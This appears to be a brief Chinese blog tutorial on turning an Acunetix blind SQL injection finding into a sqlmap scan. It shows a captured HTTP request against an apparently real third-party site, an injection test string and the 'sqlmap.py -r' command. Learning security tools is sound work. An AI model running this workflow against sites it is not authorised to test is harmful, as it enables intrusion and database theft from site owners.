本文介绍了如何使用Acunetix Web Vulnerability Scanner(AWVS10)配合sqlmap工具进行Web安全扫描,特别是针对Blind SQL注入的检测。通过右键提取请求,将请求内容保存为txt文件,并利用sqlmap的命令行选项进行扫描,以检测潜在的SQL注入漏洞。
右键Blind SQL injection
直接复制包的内容放到sqlmap目录下
去掉%20AND%203*2*1%3d6%20AND%20347%3d347
保存为1.txt
GET /article.php?id=1031HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.deta.com.cn:80/index.php
Host: www.deta.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
然后python sqlmap.py -r 1.txt
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
